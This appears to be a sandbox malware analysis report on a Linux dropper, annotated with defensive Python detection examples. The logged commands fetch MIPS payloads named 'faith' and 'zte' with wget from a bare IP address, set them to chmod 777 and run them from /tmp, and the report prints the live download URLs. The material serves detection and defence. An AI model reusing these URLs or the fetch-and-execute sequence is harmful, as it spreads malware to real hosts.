Linux Analysis Report

Overview

General Information

Analysis ID: 1562234

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Manipulation of devices in /dev
Sample deletes itself
ELF contains segments with high entropy indicating compressed/encrypted content
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection

Source: /tmp/zte Avira: detection malicious, Label: PUA/AVF.Agent.jcccr
Source: /tmp/faith Avira: detection malicious, Label: LINUX/AVI.Agent.dqzbs

Networking

Source: /bin/sh (PID: 6229) Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/faith
Source: /bin/sh (PID: 6264) Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/zte
Source: unknown TCP traffic detected without corresponding DNS query: 65.175.140.164 (48 identical entries collapsed)
Source: unknown TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: global traffic HTTP traffic detected:
  GET /images/faith HTTP/1.1
  User-Agent: Wget/1.20.3 (linux-gnu)
  Accept: */*
  Accept-Encoding: identity
  Host: 65.175.140.164
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /images/zte HTTP/1.1
  User-Agent: Wget/1.20.3 (linux-gnu)
  Accept: */*
  Accept-Encoding: identity
  Host: 65.175.140.164
  Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: classification engine Classification label: mal56.evad.lin@0/4@0/0
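The "TCP traffic detected without corresponding DNS query" entries above are produced by correlating observed connections against the DNS answers seen before them; a bot that carries its C2 or payload host as an IP literal (here 65.175.140.164, also used as the HTTP Host header) never resolves a name. The following is an added example of that correlation and is not part of the sandbox report or its engine. The event records and their field names are constructed for the example (a real deployment would read Zeek dns.log/conn.log or resolver and flow logs), and the 91.189.91.42 entry is modelled as ordinary resolved traffic from the analysis VM purely to show the contrast. Bare-IP hits to addresses the report does not attribute (54.171.230.55, 91.189.91.42) still need to be checked against the sandbox host's own background traffic before being treated as attacker infrastructure.

```python
"""Correlate DNS answers with outbound TCP connections and flag connections to
public IPs that no prior DNS answer returned (added example; constructed events)."""
import ipaddress
from collections import Counter
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Event:
    ts: float
    kind: str                       # "dns" (answer), "tcp" (new connection) or "http" (request)
    data: dict = field(default_factory=dict)


# Constructed sample modelled on the report; not a real capture.
SAMPLE_EVENTS = [
    Event(1.0, "dns", {"query": "archive.ubuntu.com", "answers": ["91.189.91.42"]}),
    Event(2.0, "tcp", {"dst": "91.189.91.42", "dport": 443}),        # resolved first: not flagged
    Event(2.5, "tcp", {"dst": "192.168.0.1", "dport": 53}),          # local resolver: ignored
    Event(3.0, "tcp", {"dst": "65.175.140.164", "dport": 80}),
    Event(3.1, "http", {"dst": "65.175.140.164", "host": "65.175.140.164",
                        "uri": "/images/faith", "ua": "Wget/1.20.3 (linux-gnu)"}),
    Event(4.0, "tcp", {"dst": "65.175.140.164", "dport": 80}),
    Event(4.1, "http", {"dst": "65.175.140.164", "host": "65.175.140.164",
                        "uri": "/images/zte", "ua": "Wget/1.20.3 (linux-gnu)"}),
    Event(5.0, "tcp", {"dst": "54.171.230.55", "dport": 443}),
    Event(6.0, "dns", {"query": "late.example", "answers": ["54.171.230.55"]}),  # answer after the connection: still flagged
]


def is_ip_literal(s: str) -> bool:
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def connections_without_dns(events, window=300.0):
    """(ts, dst, dport) for TCP connections to global IPs that no DNS answer
    within the previous `window` seconds returned. Non-global destinations
    (RFC 1918, loopback, link-local) are local infrastructure and skipped."""
    resolved = {}                   # ip -> timestamp of the last answer containing it
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns":
            for ip in ev.data.get("answers", []):
                resolved[ip] = ev.ts
        elif ev.kind == "tcp":
            dst = ev.data["dst"]
            if not ipaddress.ip_address(dst).is_global:
                continue
            last = resolved.get(dst)
            if last is None or ev.ts - last > window:
                hits.append((ev.ts, dst, ev.data["dport"]))
    return hits


def bare_ip_downloads(events, tools=("wget/", "curl/")):
    """HTTP requests whose Host header is an IP literal and whose User-Agent is a
    command-line downloader: the shape of the two GETs in the report."""
    out = []
    for ev in events:
        if ev.kind != "http":
            continue
        host = ev.data.get("host", "")
        ua = ev.data.get("ua", "")
        if is_ip_literal(host) and ua.lower().startswith(tools):
            out.append((ev.ts, host, ev.data.get("uri"), ua))
    return out


def summarize(events):
    """Collapse repeated hits per destination; the raw report lists one line per connection."""
    return Counter(dst for _, dst, _ in connections_without_dns(events))


if __name__ == "__main__":
    for ts, dst, dport in connections_without_dns(SAMPLE_EVENTS):
        print(f"{ts:6.1f}  no-DNS TCP -> {dst}:{dport}")
    print(dict(summarize(SAMPLE_EVENTS)))
    print(bare_ip_downloads(SAMPLE_EVENTS))
```

The window keeps a stale answer from whitelisting a much later connection; tune it to your resolver TTLs. A detection built only on "no DNS" is noisy on hosts that use DoH or a forwarding resolver the sensor cannot see, so pair it with the bare-IP Host header check, which does not depend on DNS visibility at all.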

Data Obfuscation

Source: /tmp/faith (PID: 6252) Deleted: /dev/test_write
Source: /tmp/faith (PID: 6252) Written: /dev/test_write
Source: /tmp/zte (PID: 6266) Deleted: /dev/test_write
Source: /tmp/zte (PID: 6266) Written: /dev/test_write
Source: /tmp/faith (PID: 6254) Shell command executed: sh -c mount
Source: /tmp/zte (PID: 6268) Shell command executed: sh -c mount
Source: /bin/sh (PID: 6251) Chmod executable: /usr/bin/chmod -> chmod 777 faith
Source: /bin/sh (PID: 6265) Chmod executable: /usr/bin/chmod -> chmod 777 zte
Source: /usr/bin/dash (PID: 6232) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
Source: /usr/bin/dash (PID: 6233) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq
Source: /bin/sh (PID: 6229) Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/faith
Source: /bin/sh (PID: 6264) Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/zte
Source: /usr/bin/chmod (PID: 6251) File: /tmp/faith (bits: - usr: rwx grp: rwx all: rwx)
Source: /usr/bin/chmod (PID: 6265) File: /tmp/zte (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/sh (PID: 6251) Chmod executable with 777: /usr/bin/chmod -> chmod 777 faith
Source: /bin/sh (PID: 6265) Chmod executable with 777: /usr/bin/chmod -> chmod 777 zte
Source: /usr/bin/wget (PID: 6229) File written: /tmp/faith
Source: /usr/bin/wget (PID: 6264) File written: /tmp/zte
Source: submitted sample Stderr (exit code = 0):
  --2024-11-25 04:35:29--  http://65.175.140.164/images/faith
  Connecting to 65.175.140.164:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 69440 (68K) [text/plain]
  Saving to: faith
  2024-11-25 04:35:31 (154 KB/s) - faith saved [69440/69440]
  --2024-11-25 04:35:31--  http://65.175.140.164/images/zte
  Connecting to 65.175.140.164:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 68124 (67K) [text/plain]
  Saving to: zte
  2024-11-25 04:35:33 (153 KB/s) - zte saved [68124/68124]
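The sequence recorded above is the classic dropper chain: wget fetches a payload from a bare IP (served as text/plain although it is an ELF), chmod 777 makes it executable, and the file is run from /tmp. The following is an added example of a process-event rule for that chain; it is not part of the sandbox report or its signature engine. The event schema (pid, ppid, exe, argv, cwd) is an assumption modelled on auditd EXECVE records, the parent shell PID 6200 and the benign final event are invented, and the other PIDs and command lines are taken from the report.

```python
"""Detect download -> chmod (exec bit) -> execute chains from process-start events
(added example; constructed events, assumed schema)."""
import ipaddress
import os
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Exec:
    """One process start. Schema is an assumption modelled on auditd EXECVE records."""
    pid: int
    ppid: int
    exe: str
    argv: tuple
    cwd: str = "/tmp"


# Constructed events mirroring the report's command lines and PIDs; the parent
# shell PID (6200) and the benign last entry are invented for the example.
SAMPLE = [
    Exec(6229, 6200, "/usr/bin/wget", ("wget", "http://65.175.140.164/images/faith")),
    Exec(6251, 6200, "/usr/bin/chmod", ("chmod", "777", "faith")),
    Exec(6252, 6200, "/tmp/faith", ("./faith",)),
    Exec(6254, 6252, "/bin/sh", ("sh", "-c", "mount")),
    Exec(6264, 6200, "/usr/bin/wget", ("wget", "http://65.175.140.164/images/zte")),
    Exec(6265, 6200, "/usr/bin/chmod", ("chmod", "777", "zte")),
    Exec(6266, 6200, "/tmp/zte", ("./zte",)),
    Exec(7000, 6900, "/usr/bin/wget", ("wget", "https://mirror.example.org/notes.txt")),  # never chmod'ed or run
]


def parse_download(argv):
    """Return (url, output file name) for a wget/curl command line, or (None, None)."""
    url, out, args = None, None, list(argv[1:])
    i = 0
    while i < len(args):
        if args[i] in ("-O", "-o") and i + 1 < len(args):   # explicit output name
            out = args[i + 1]
            i += 2
            continue
        if args[i].startswith(("http://", "https://", "ftp://")):
            url = args[i]
        i += 1
    if url is None:
        return None, None
    if out is None:                                          # wget default: last URL path component
        out = urlsplit(url).path.rsplit("/", 1)[-1] or "index.html"
    return url, out


def host_is_ip_literal(url: str) -> bool:
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False


def grants_exec(mode: str) -> bool:
    """True for a chmod mode that sets any execute bit: octal (777, 755) or symbolic (+x, a=rx)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return bool(int(mode, 8) & 0o111)
    return re.search(r"[+=][rwst]*x", mode) is not None


def detect_drop_and_exec(events):
    """Chain: downloader writes F -> chmod grants exec on F -> F is executed.
    Tracked per parent PID so unrelated shells do not cross-match."""
    downloads = {}                  # (ppid, absolute path) -> record
    findings = []
    for ev in events:               # events are assumed to be in start order
        tool = os.path.basename(ev.exe)
        if tool in ("wget", "curl"):
            url, out = parse_download(ev.argv)
            if url:
                key = (ev.ppid, os.path.normpath(os.path.join(ev.cwd, out)))
                downloads[key] = {"url": url, "download_pid": ev.pid}
        elif tool == "chmod" and len(ev.argv) > 2 and grants_exec(ev.argv[1]):
            for f in ev.argv[2:]:
                rec = downloads.get((ev.ppid, os.path.normpath(os.path.join(ev.cwd, f))))
                if rec:
                    rec["chmod_pid"] = ev.pid
        else:
            rec = downloads.get((ev.ppid, os.path.normpath(ev.exe)))
            if rec and "chmod_pid" in rec:
                findings.append({"file": os.path.normpath(ev.exe), "url": rec["url"],
                                 "bare_ip_host": host_is_ip_literal(rec["url"]),
                                 "pids": (rec["download_pid"], rec["chmod_pid"], ev.pid)})
    return findings


if __name__ == "__main__":
    for f in detect_drop_and_exec(SAMPLE):
        print(f)
```

The rule keys on the file identity (parent shell plus resolved path) rather than on "wget followed by chmod" alone, which is how the benign download in the sample stays silent. The report's /dev/test_write write-then-delete and `sh -c mount` by the dropped binaries are a separate behaviour (probing for a writable location) and would be a second rule, not part of this chain.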

Hooking and other Techniques for Hiding and Protection

Source: /tmp/faith (PID: 6252) File: /tmp/faith
Source: /tmp/zte (PID: 6266) File: /tmp/zte
Source: faith.12.dr Dropped file: segment LOAD with 7.9127 entropy (max. 8.0)
Source: faith.12.dr Dropped file: segment LOAD with 7.971 entropy (max. 8.0)
Source: zte.27.dr Dropped file: segment LOAD with 7.9076 entropy (max. 8.0)
Source: zte.27.dr Dropped file: segment LOAD with 7.9709 entropy (max. 8.0)
Source: /tmp/faith (PID: 6252) Queries kernel information via 'uname':
Source: /usr/bin/mount (PID: 6260) Queries kernel information via 'uname':
Source: /tmp/zte (PID: 6266) Queries kernel information via 'uname':
Source: /usr/bin/mount (PID: 6273) Queries kernel information via 'uname':
Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mipsel
Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp Binary or memory string: U1!/etc/qemu-binfmt/mipsel
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mipsel./faithfaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./faith
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips./ztefaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./zte
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mipsel
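Two findings in this section come straight from the ELF program headers of the dropped files: the LOAD segments with entropy near 8.0 (compressed or encrypted content, since native code sits well below that), and the qemu-mipsel / qemu-mips strings in memory, which show that faith is a little-endian MIPS binary and zte a big-endian one being run under user-mode QEMU via binfmt (the uname calls by mount and the emulated binaries are a side effect of that setup rather than necessarily evasion). The following is an added example of computing both from the raw headers; it is not the sandbox's code. The sample image it analyses is constructed in the block (an ELF32 big-endian MIPS file with one maximal-entropy segment and one zero segment) rather than the report's dropped files, and the 7.5 threshold is an assumption.

```python
"""ELF triage: architecture/endianness from e_ident and e_machine, and Shannon
entropy of every PT_LOAD segment (added example; constructed sample ELF)."""
import math
import struct
from collections import Counter

PT_LOAD = 1
EM_NAMES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}   # e_machine values


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_elf(blob: bytes) -> dict:
    """Read the ELF header and every PT_LOAD program header. Section headers are
    not needed, which matters because stripped or packed samples often have none."""
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = blob[4], blob[5]
    end = {1: "<", 2: ">"}[ei_data]                      # EI_DATA: 1 little, 2 big endian
    if ei_class == 1:                                    # ELF32: 52-byte ehdr, 32-byte phdr
        hdr = struct.unpack_from(end + "HHIIIIIHHH", blob, 16)
        ph_fmt = end + "IIIIIIII"
        ph_fields = ("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_flags", "p_align")
    elif ei_class == 2:                                  # ELF64: 64-byte ehdr, 56-byte phdr
        hdr = struct.unpack_from(end + "HHIQQQIHHH", blob, 16)
        ph_fmt = end + "IIQQQQQQ"
        ph_fields = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_align")
    else:
        raise ValueError(f"bad EI_CLASS {ei_class}")
    e_machine, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[4], hdr[8], hdr[9]
    segments = []
    for i in range(e_phnum):
        ph = dict(zip(ph_fields, struct.unpack_from(ph_fmt, blob, e_phoff + i * e_phentsize)))
        if ph["p_type"] != PT_LOAD:
            continue
        data = blob[ph["p_offset"]: ph["p_offset"] + ph["p_filesz"]]
        flags = "".join(ch if ph["p_flags"] & bit else "-" for ch, bit in (("r", 4), ("w", 2), ("x", 1)))
        segments.append({"index": i, "offset": ph["p_offset"], "filesz": ph["p_filesz"],
                         "flags": flags, "entropy": round(shannon_entropy(data), 4)})
    return {"elf_class": 32 if ei_class == 1 else 64,
            "endian": "little" if ei_data == 1 else "big",
            "machine": EM_NAMES.get(e_machine, f"unknown({e_machine})"),
            "segments": segments}


def triage(blob: bytes, threshold: float = 7.5) -> dict:
    """Flag LOAD segments whose entropy suggests packed/encrypted content (the
    threshold is an assumption) and segments mapped writable and executable."""
    info = parse_elf(blob)
    info["high_entropy"] = [s["index"] for s in info["segments"] if s["entropy"] >= threshold]
    info["rwx_segments"] = [s["index"] for s in info["segments"] if s["flags"] == "rwx"]
    return info


def build_sample_elf() -> bytes:
    """Constructed ELF32 big-endian MIPS image: one LOAD segment of uniformly
    distributed bytes (entropy exactly 8.0, standing in for a packed segment) and
    one all-zero LOAD segment (entropy 0.0). Not one of the report's files."""
    packed = bytes(range(256)) * 16
    zeros = b"\x00" * 1024
    ehsize, phentsize = 52, 32
    off1 = ehsize + 2 * phentsize
    off2 = off1 + len(packed)
    ident = b"\x7fELF" + bytes([1, 2, 1, 0, 0]) + b"\x00" * 7      # class 32, big endian, v1, SysV ABI
    ehdr = ident + struct.pack(">HHIIIIIHHHHHH", 2, 8, 1, 0x400000, ehsize, 0, 0,
                               ehsize, phentsize, 2, 0, 0, 0)       # ET_EXEC, EM_MIPS, two phdrs
    ph1 = struct.pack(">IIIIIIII", PT_LOAD, off1, 0x400000, 0x400000, len(packed), len(packed), 5, 0x1000)  # r-x
    ph2 = struct.pack(">IIIIIIII", PT_LOAD, off2, 0x410000, 0x410000, len(zeros), len(zeros), 6, 0x1000)    # rw-
    return ehdr + ph1 + ph2 + packed + zeros


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(triage(blob))
```

Run it with a path to inspect a real dropped file; with no argument it analyses the constructed image. The entropy measure is per LOAD segment rather than per file, which is why a small unpacking stub plus a large packed body still scores near 8.0 for the body, as the report's 7.9x values show.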